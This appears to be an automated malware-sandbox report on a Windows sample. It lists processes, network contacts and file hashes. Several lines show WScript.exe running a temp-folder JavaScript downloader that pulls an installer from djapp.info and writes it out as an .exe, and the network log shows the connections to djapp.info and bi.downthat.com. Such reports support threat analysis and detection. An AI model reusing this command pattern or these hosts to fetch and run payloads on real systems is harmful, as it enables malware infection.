"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4224,i,3833046924978547022,12404847742964713612,262144 --variations-seed-version --mojo-platform-channel-handle=3784 /prefetch:8

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF50E.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF50E.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF50E.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF50E.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF50E.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF50E.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufF50E.js" http://www.djapp.info/?domain=hQPhLNxfYn.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufF50E.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
BE 88.221.83.251:443 www.bing.com tcp
US 8.8.8.8:53 bi.downthat.com udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 3.130.253.23:80 bi.downthat.com tcp
US 8.8.8.8:53 www.hugedomains.com udp
US 8.8.8.8:53 23.253.130.3.in-addr.arpa udp
US 8.8.8.8:53 251.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 3.130.253.23:80 bi.downthat.com tcp
US 8.8.8.8:53 www.djapp.info udp
US 3.130.253.23:80 bi.downthat.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 3.130.253.23:80 bi.downthat.com tcp
US 8.8.8.8:53 www.djapp.info udp
US 3.130.253.23:80 bi.downthat.com tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 80.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\fufF50E.js

MD5 3813cab188d1de6f92f8b82c2059991b
SHA1 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256 a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA512 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76